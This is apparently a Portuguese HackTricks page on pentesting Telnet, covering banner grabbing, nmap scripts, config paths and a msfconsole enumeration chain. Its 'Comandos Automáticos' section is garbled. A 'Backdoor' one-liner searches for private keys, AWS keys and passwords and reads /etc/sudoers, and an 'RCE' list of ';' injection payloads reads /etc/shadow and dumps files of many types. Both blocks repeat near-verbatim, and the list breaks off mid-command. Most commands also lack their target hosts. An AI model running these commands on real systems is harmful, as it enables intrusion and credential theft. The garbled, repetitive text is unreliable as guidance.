## **Informações Básicas** Telnet é um protocolo de rede que oferece aos usuários uma maneira INsegura de acessar um computador por meio de uma rede. **Porta padrão:** 23 ``` 23/tcp open telnet ``` ## Enumeração ### Coleta de Banner ```bash nc -vn 23 ``` Toda a enumeração interessante pode ser realizada pelo **nmap**: ```bash nmap -n -sV -Pn --script "*telnet* and safe" -p 23 ``` O script `telnet-ntlm-info.nse` obterá informações NTLM (versões do Windows). No Protocolo TELNET, existem várias "**opções**" que serão sancionadas e podem ser usadas com a estrutura "**DO, DON'T, WILL, WON'T**" para permitir que um usuário e servidor concordem em usar um conjunto de convenções mais elaborado (ou talvez apenas diferente) para sua conexão TELNET. Essas opções podem incluir a alteração do conjunto de caracteres, o modo de eco, etc. (Do [telnet RFC](https://tools.ietf.org/html/rfc854))\ **Eu sei que é possível enumerar essas opções, mas não sei como, então me avise se souber como.** ### [Força bruta](../generic-methodologies-and-resources/brute-force.md#telnet) ## Arquivo de configuração ```bash /etc/inetd.conf /etc/xinetd.d/telnet /etc/xinetd.d/stelnet ``` ## Comandos Automáticos do HackTricks ### Telnet #### Banner Grabbing ##### Using Nmap ##### Usando Nmap ```bash nmap -sV --script=banner -p ``` ##### Using Telnet ##### Usando Telnet ```bash telnet ``` #### Authentication Bypass ##### Null Session ##### Sessão Nula ```bash telnet ``` ```bash GET / HTTP/1.0 ``` ##### Backdoor ##### Backdoor ```bash telnet ``` ```bash id;uname -a;w;echo "Distributor ID: ";cat /etc/*-release;echo "";echo "Kernel: ";uname -a;echo "";echo "Uptime: ";uptime;echo "";echo "Processes: ";ps auxf --width 200;echo "";echo "Logged In: ";who;echo "";echo "Home Directories: ";ls -ahl /home;echo "";echo "Private SSH Keys: ";find / -name id_rsa* 2>/dev/null;echo "";echo "Sudoers: ";cat /etc/sudoers 2>/dev/null;echo "";echo "Cron Jobs: ";ls -ahl /etc/cron* 2>/dev/null;echo "";echo "Listening Ports: ";netstat -antup 2>/dev/null;echo "";echo "Established Connections: ";netstat -anp | grep ESTABLISHED 2>/dev/null;echo "";echo "ARP Cache: ";arp -a;echo "";echo "DNS Servers: ";cat /etc/resolv.conf;echo "";echo "Routing Table: ";route;echo "";echo "Firewall Rules: ";iptables -L;echo "";echo "Hostname: ";hostname;echo "";echo "Network Configuration: ";ifconfig -a;echo "";echo "Available Interfaces: ";ls /sys/class/net;echo "";echo "Default Route: ";ip route show;echo "";echo "All Users: ";cat /etc/passwd;echo "";echo "All Groups: ";cat /etc/group;echo "";echo "All Shells: ";cat /etc/shells;echo "";echo "All Services: ";ls /etc/init.d/;echo "";echo "All Applications: ";ls /usr/share/applications/;echo "";echo "All Binaries: ";ls /usr/bin/;echo "";echo "All SUID Binaries: ";find / -perm -4000 -type f 2>/dev/null;echo "";echo "All SGID Binaries: ";find / -perm -2000 -type f 2>/dev/null;echo "";echo "All World Writable Directories: ";find / -perm -2 -type d 2>/dev/null;echo "";echo "All World Writable Files: ";find / -perm -2 -type f 2>/dev/null;echo "";echo "All Files with Sticky Bit: ";find / -perm -1000 -type d 2>/dev/null;echo "";echo "All Files with Immutable Bit: ";lsattr -aR | grep "\i";echo "";echo "All Files with No Owner: ";find / -xdev \( -nouser -o -nogroup \) -print;echo "";echo "All Files with No Permissions: ";find / -xdev \( -type f -o -type d \) ! -perm /o=rwx -print;echo "";echo "All Files with SUID/SGID and World Writable: ";find / -perm -4007 -o -perm -2007 -type f -exec ls -la {} \; 2>/dev/null;echo "";echo "All Files with Hidden Attribute: ";find / -name ".*" -ls 2>/dev/null;echo "";echo "All Files with Passwords: ";grep -Rl password / 2>/dev/null;echo "";echo "All Files with Private Keys: ";grep -Rl "BEGIN RSA PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with AWS Keys: ";grep -Rl "AKIA" / 2>/dev/null;echo "";echo "All Files with Encryption Keys: ";grep -Rl "-----BEGIN ENCRYPTED PRIVATE KEY-----" / 2>/dev/null;echo "";echo "All Files with SSH Keys: ";grep -Rl "BEGIN OPENSSH PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL Certificates: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL Private Keys: ";grep -Rl "BEGIN RSA PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL PFX: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL JKS: ";grep -Rl "BEGIN JAVA KEYSTORE" / 2>/dev/null;echo "";echo "All Files with SSL PEM: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL DER: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CRT: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL KEY: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CER: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL P12: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL P7B: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo "";echo "All Files with SSL P7C: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo "";echo "All Files with SSL PFX: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL JKS: ";grep -Rl "BEGIN JAVA KEYSTORE" / 2>/dev/null;echo "";echo "All Files with SSL PEM: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL DER: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CRT: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL KEY: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CER: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL P12: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL P7B: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo "";echo "All Files with SSL P7C: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo ""; ``` ##### Remote Code Execution ##### Execução Remota de Código ```bash telnet ``` ```bash ;id ``` ```bash ;uname -a ``` ```bash ;cat /etc/passwd ``` ```bash ;cat /etc/shadow ``` ```bash ;ls -ahl /home ``` ```bash ;ls -ahl /root ``` ```bash ;find / -name *.bak -type f -exec cat {} \; ``` ```bash ;find / -name *.log -type f -exec cat {} \; ``` ```bash ;find / -name *.conf -type f -exec cat {} \; ``` ```bash ;find / -name *.config -type f -exec cat {} \; ``` ```bash ;find / -name *.db -type f -exec cat {} \; ``` ```bash ;find / -name *.sql -type f -exec cat {} \; ``` ```bash ;find / -name *.ini -type f -exec cat {} \; ``` ```bash ;find / -name *.xml -type f -exec cat {} \; ``` ```bash ;find / -name *.json -type f -exec cat {} \; ``` ```bash ;find / -name *.yml -type f -exec cat {} \; ``` ```bash ;find / -name *.yaml -type f -exec cat {} \; ``` ```bash ;find / -name *.py -type f -exec cat {} \; ``` ```bash ;find / -name *.php -type f -exec cat {} \; ``` ```bash ;find / -name *.pl -type f -exec cat {} \; ``` ```bash ;find / -name *.rb -type f -exec cat {} \; ``` ```bash ;find / -name *.sh -type f -exec cat {} \; ``` ```bash ;find / -name *.bash -type f -exec cat {} \; ``` ```bash ;find / -name *.ps1 -type f -exec cat {} \; ``` ```bash ;find / -name *.psm1 -type f -exec cat {} \; ``` ```bash ;find / -name *.psd1 -type f -exec cat {} \; ``` ```bash ;find / -name *.psc1 -type f -exec cat {} \; ``` ```bash ;find / -name *.psc2 -type f -exec cat {} \; ``` ```bash ;find / -name *.pyc -type f -exec cat {} \; ``` ```bash ;find / -name *.pyo -type f -exec cat {} \; ``` ```bash ;find / -name *.class -type f -exec cat {} \; ``` ```bash ;find / -name *.jar -type f -exec cat {} \; ``` ```bash ;find / -name *.war -type f -exec cat {} \; ``` ```bash ;find / -name *.ear -type f -exec cat {} \; ``` ```bash ;find / -name *.jsp -type f -exec cat {} \; ``` ```bash ;find / -name *.jspx -type f -exec cat {} \; ``` ```bash ;find / -name *.swf -type f -exec cat {} \; ``` ```bash ;find / -name *.fla -type f -exec cat {} \; ``` ```bash ;find / -name *.as -type f -exec cat {} \; ``` ```bash ;find / -name *.aspx -type f -exec cat {} \; ``` ```bash ;find / -name *.ascx -type f -exec cat {} \; ``` ```bash ;find / -name *.config -type f -exec cat {} \; ``` ```bash ;find / -name *.cs -type f -exec cat {} \; ``` ```bash ;find / -name *.csproj -type f -exec cat {} \; ``` ```bash ;find / -name *.vb -type f -exec cat {} \; ``` ```bash ;find / -name *.vbproj -type f -exec cat {} \; ``` ```bash ;find / -name *.java -type f -exec cat {} \; ``` ```bash ;find / -name *.jsp -type f -exec cat {} \; ``` ```bash ;find / -name *.jspx -type f -exec cat {} \; ``` ```bash ;find / -name *.jspx -type f -exec cat {} \; ``` ```bash ;find / -name *.jspx -type f -exec cat {} \; ``` ```bash ;find / -name *.php -type f -exec cat {} \; ``` ```bash ;find / -name *.php3 -type f -exec cat {} \; ``` ```bash ;find / -name *.php4 -type f -exec cat {} \; ``` ```bash ;find / -name *.php5 -type f -exec cat {} \; ``` ```bash ;find / -name *.phtml -type f -exec cat {} \; ``` ```bash ;find / -name *.inc -type f -exec cat {} \; ``` ```bash ;find / -name *.pl -type f -exec cat {} \; ``` ```bash ;find / -name *.pm -type f -exec cat {} \; ``` ```bash ;find / -name *.cgi -type f -exec cat {} \; ``` ```bash ;find / -name *.dll -type f -exec cat {} \; ``` ```bash ;find / -name *.exe -type f -exec cat {} \; ``` ```bash ;find / -name *.bat -type f -exec cat {} \; ``` ```bash ;find / -name *.cmd -type f -exec cat {} \; ``` ```bash ;find / -name *.vbs -type f -exec cat {} \; ``` ```bash ;find / -name *.vbe -type f -exec cat {} \; ``` ```bash ;find / -name *.js -type f -exec cat {} \; ``` ```bash ;find / -name *.jse -type f -exec cat {} \; ``` ```bash ;find / -name *.wsf -type f -exec cat {} \; ``` ```bash ;find / -name *.wsc -type f -exec cat {} \; ``` ```bash ;find / -name *.ps1 -type f -exec cat {} \; ``` ```bash ;find / -name *.psm1 -type f -exec cat {} \; ``` ```bash ;find / -name *.psd1 -type f -exec cat {} \; ``` ```bash ;find / -name *.psc1 -type f -exec cat {} \; ``` ```bash ;find / -name *.psc2 -type f -exec cat {} \; ``` ```bash ;find / -name *.pyc -type f -exec cat {} \; ``` ```bash ;find / -name *.pyo -type f -exec cat {} \; ``` ```bash ;find / -name *.class -type f -exec cat {} \; ``` ```bash ;find / -name *.jar -type f -exec cat {} \; ``` ```bash ;find / -name *.war -type f -exec cat {} \; ``` ```bash ;find / -name *.ear -type f -exec cat {} \; ``` ```bash ;find / -name *.jsp -type f -exec cat {} \; ``` ```bash ;find / -name *.jspx -type f -exec cat {} \; ``` ```bash ;find / -name *.swf -type f -exec cat {} \; ``` ```bash ;find / -name *.fla -type f -exec cat {} \; ``` ```bash ;find / -name *.as -type f -exec cat {} \; ``` ```bash ;find / -name *.aspx -type f -exec cat {} \; ``` ```bash ;find / -name *.ascx -type f -exec cat {} \; ``` ```bash ;find / -name *.config -type f -exec cat {} \; ``` ```bash ;find / -name *.cs -type f -exec cat {} \; ``` ```bash ;find / -name *.csproj -type f -exec cat {} \; ``` ```bash ;find / -name *.vb -type f -exec cat {} \; ``` ```bash ;find / -name *.vbproj -type f -exec cat {} \; ``` ```bash ;find / -name *.java -type f -exec cat {} \; ``` ```bash ;find / -name *.jsp -type f -exec cat {} \; ``` ```bash ;find / -name *.jspx -type f -exec cat {} \; ``` ```bash ;find / -name *.jspx -type f -exec cat {} \; ``` ```bash ;find / -name *.jspx -type f -exec cat {} \; ``` ```bash ;find / -name *.php -type f -exec cat {} \; ``` ```bash ;find / -name *.php3 -type f -exec cat {} \; ``` ```bash ;find / -name *.php4 -type f -exec cat {} \; ``` ```bash ;find / -name *.php5 -type f -exec cat {} \; ``` ```bash ;find / -name *.phtml -type f -exec cat {} \; ``` ```bash ;find / -name *.inc -type f -exec cat {} \; ``` ```bash ;find / -name *.pl -type f -exec cat {} \; ``` ```bash ;find / -name *.pm -type f -exec cat {} \; ``` ```bash ;find / -name *.cgi -type f -exec cat {} \; ``` ```bash ;find / -name *.dll -type f -exec cat {} \; ``` ```bash ;find / -name *.exe -type f -exec cat {} \; ``` ```bash ;find / -name *.bat -type f -exec cat {} \; ``` ```bash ;find / -name *.cmd -type f -exec cat {} \; ``` ```bash ;find / -name *.vbs - ``` Protocol_Name: Telnet #Protocol Abbreviation if there is one. Port_Number: 23 #Comma separated if there is more than one. Protocol_Description: Telnet #Protocol Abbreviation Spelled out Entry_1: Name: Notes Description: Notes for t=Telnet Note: | wireshark to hear creds being passed tcp.port == 23 and ip.addr != myip https://book.hacktricks.xyz/pentesting/pentesting-telnet Entry_2: Name: Banner Grab Description: Grab Telnet Banner Command: nc -vn {IP} 23 Entry_3: Name: Nmap with scripts Description: Run nmap scripts for telnet Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP} Entry_4: Name: consoleless mfs enumeration Description: Telnet enumeration without the need to run msfconsole Note: sourced from https://github.com/carlospolop/legion Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit' ```
[**A Conferência de Segurança DragonJAR é um evento internacional de cibersegurança**](https://www.dragonjarcon.org/) com mais de uma década de existência que será realizada nos dias 7 e 8 de setembro de 2023 em Bogotá, Colômbia. É um evento com grande conteúdo técnico onde são apresentadas as últimas pesquisas em espanhol que atraem hackers e pesquisadores de todo o mundo.\ Registre-se agora no seguinte link e não perca esta grande conferência!: {% embed url="https://www.dragonjarcon.org/" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 * Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) * **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).